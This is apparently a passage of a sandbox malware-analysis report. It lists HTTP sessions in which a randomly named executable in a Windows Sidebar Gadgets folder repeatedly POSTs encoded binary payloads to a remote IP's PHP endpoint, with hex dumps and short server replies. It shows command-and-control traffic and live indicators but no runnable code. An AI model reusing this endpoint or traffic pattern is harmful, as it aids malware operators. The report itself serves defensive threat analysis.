                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:04.863758087 CET2576OUTData Raw: 5e 50 5e 5c 58 5a 55 58 54 5b 59 5a 5b 51 57 5c 5f 5d 5a 55 52 54 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P^\XZUXT[YZ[QW\_]ZURTPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B)>-5:#&?')8-35[1?6.# 3:;&/<S+#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:08:05.205550909 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:05.334104061 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:05 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  50192.168.2.44984386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:05.461045980 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:05.816828966 CET2576OUTData Raw: 5b 56 5e 58 58 5b 50 5b 54 5b 59 5a 5b 5e 57 52 5f 56 5a 5a 52 55 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^XX[P[T[YZ[^WR_VZZRUPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?>[59/2(D>3'9]%*5'%U#8$(D$()#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:06.160938978 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:06.291901112 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:06 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  51192.168.2.44984986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:06.494801044 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:06.848973989 CET2576OUTData Raw: 5b 57 5e 59 5d 5e 50 51 54 5b 59 5a 5b 5e 57 5a 5f 51 5a 59 52 5d 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^Y]^PQT[YZ[^WZ_QZYR]PE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&)>"!(%/(8=3'*2,>")T70)#'/U<)#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:07.173010111 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  52192.168.2.44985286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:07.183634043 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:07.535588026 CET2164OUTData Raw: 5b 57 5e 58 58 5a 50 5c 54 5b 59 5a 5b 56 57 52 5f 56 5a 5c 52 5c 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^XXZP\T[YZ[VWR_VZ\R\PH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(>":<%<((6^'X&Y)5Q7+%)4$$?#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:08:07.848640919 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:07.981812000 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:07 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 02 26 2b 31 00 28 3c 3b 58 26 33 0f 5e 36 30 23 04 2f 33 35 1b 35 02 3d 5f 31 5d 20 51 3f 03 0f 1b 3f 0d 2e 0d 23 3d 2d 1e 3c 0a 28 5d 03 10 39 5b 3f 3e 37 12 3d 2e 3a 00 3a 0e 23 5c 27 09 34 5c 3e 33 21 56 27 3c 26 56 22 03 2f 56 2a 33 0b 5b 33 02 2f 05 28 0e 2c 01 27 3d 20 54 0b 17 27 1c 33 20 24 00 26 38 29 1f 29 19 38 12 27 04 25 56 21 3c 2d 0e 20 17 2f 02 2f 1e 29 57 27 28 3e 0e 2b 2d 20 0c 26 3a 35 01 33 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '&+1(<;X&3^60#/355=_1] Q??.#=-<(]9[?>7=.::#\'4\>3!V'<&V"/V*3[3/(,'= T'3 $&8))8'%V!<- //)W'(>+- &:53.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  53192.168.2.44985686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:07.334470034 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:07.691826105 CET2576OUTData Raw: 5b 54 5e 5b 58 5b 55 5b 54 5b 59 5a 5b 5f 57 5c 5f 57 5a 59 52 50 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^[X[U[T[YZ[_W\_WZYRPPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+-6!)0U&**Y'B9% '%!;<Y0(@&<;(#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:08.032813072 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:08.163777113 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:07 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  54192.168.2.44986286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:08.285571098 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:08.644962072 CET2576OUTData Raw: 5b 57 5e 59 58 5c 55 5d 54 5b 59 5a 5b 52 57 5f 5f 50 5a 5c 52 53 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^YX\U]T[YZ[RW__PZ\RSPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&E<["(T2Z E>1$4=Z%=V!7&7('*?'<,S+#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:08.980829954 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:09.116115093 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:08 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  55192.168.2.44986886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:09.319385052 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:09.677324057 CET2576OUTData Raw: 5b 50 5b 58 5d 59 55 5a 54 5b 59 5a 5b 52 57 5c 5f 54 5a 5e 52 50 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P[X]YUZT[YZ[RW\_TZ^RPP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?![!9$S%<8A*;Z0$.%!5'& (0)0#+9#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:09.998667955 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:10.126106024 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:09 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  56192.168.2.44987686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:10.281893015 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:10.629309893 CET2568OUTData Raw: 5b 56 5e 5e 5d 5e 50 5e 54 5b 59 5a 5b 57 57 5e 5f 56 5a 58 52 51 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^^]^P^T[YZ[WW^_VZXRQP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&E(6!0& E(;*3$.1? 4-Q ;0Y$4D'?#?#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:10.972764015 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:11.102176905 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:10 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  57192.168.2.44988286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:11.225688934 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:11.582530022 CET2576OUTData Raw: 5b 5d 5b 5f 58 5a 55 5d 54 5b 59 5a 5b 55 57 5c 5f 51 5a 55 52 53 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [][_XZU]T[YZ[UW\_QZURSPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)-56$W%0C)._3=Y&Y=!7!Q#0\0)$A$0S<#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:08:11.937881947 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:12.071604967 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:11 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  58192.168.2.44989186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:12.195523977 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:12.551397085 CET2576OUTData Raw: 5b 57 5e 5e 5d 5b 50 5e 54 5b 59 5a 5b 5f 57 5d 5f 50 5a 5b 52 55 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^^][P^T[YZ[_W]_PZ[RUPH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?=-^6*2 D)(>3&%6$*43';'U+#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:12.900513887 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  59192.168.2.44989686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:12.994568110 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:13.348377943 CET2164OUTData Raw: 5b 51 5e 51 58 56 50 5e 54 5b 59 5a 5b 5e 57 59 5f 5c 5a 55 52 54 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q^QXVP^T[YZ[^WY_\ZURTPH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&)>\#*8W&<(=823B619S6'*#+ \$+$/ U)9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:13.684550047 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:13.816065073 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:13 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 1e 32 5d 2e 5b 28 3f 09 5e 25 23 31 5a 36 23 3c 17 38 30 0f 1d 22 02 2e 06 32 05 05 0f 28 03 0b 1a 28 55 39 1c 23 07 2e 0b 2b 1a 28 5d 03 10 3a 04 3f 13 23 58 2a 10 2d 5f 2e 34 23 14 33 09 38 5a 3d 0a 21 54 25 2f 36 53 22 04 3f 10 29 0d 39 10 24 15 02 16 28 0e 3f 5b 25 3d 20 54 0b 17 27 1d 33 33 24 02 26 06 25 1f 29 0e 20 59 30 04 26 0a 36 02 00 14 20 39 24 5e 2c 1e 29 53 25 28 25 56 2a 3e 3f 56 24 29 29 04 27 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $2].[(?^%#1Z6#<80".2((U9#.+(]:?#X*-_.4#38Z=!T%/6S"?)9$(?[%= T'33$&%) Y0&6 9$^,)S%(%V*>?V$))'+.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  60192.168.2.44989786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:13.135226011 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:13.488719940 CET2576OUTData Raw: 5b 53 5e 58 5d 5a 50 5b 54 5b 59 5a 5b 54 57 59 5f 55 5a 58 52 5c 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [S^X]ZP[T[YZ[TWY_UZXR\PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(.*#9'1<>]2X%4',9V!'>7#%)4D&/?<9#Y'$X.-
